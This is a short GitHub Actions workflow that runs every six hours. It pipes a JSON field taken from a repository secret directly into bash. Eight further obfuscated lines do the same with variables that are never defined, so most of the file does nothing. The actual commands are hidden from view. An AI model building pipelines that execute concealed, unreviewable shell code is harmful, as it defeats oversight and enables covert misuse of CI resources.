name: songzhifu1289
on:
  workflow_dispatch:
  schedule:
    - cron: '18 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: songzhifu1289
        env:
          x73: ${{ secrets.x73 }}
        run: |
          echo $x73 | jq -r .ikj5 | /bin/bash
          echo $gd4208 | jq -r .z56 | /bin/bash
          echo $cmno8 | jq -r .h30440 | /bin/bash
          echo $jvl53 | jq -r .ugj9 | /bin/bash
          echo $imor7 | jq -r .qpul30883 | /bin/bash
          echo $j9 | jq -r .qb7342 | /bin/bash
          echo $sunl8 | jq -r .p5 | /bin/bash
          echo $o2 | jq -r .otrag4924 | /bin/bash
          echo $ozm6280 | jq -r .swrz181 | /bin/bash

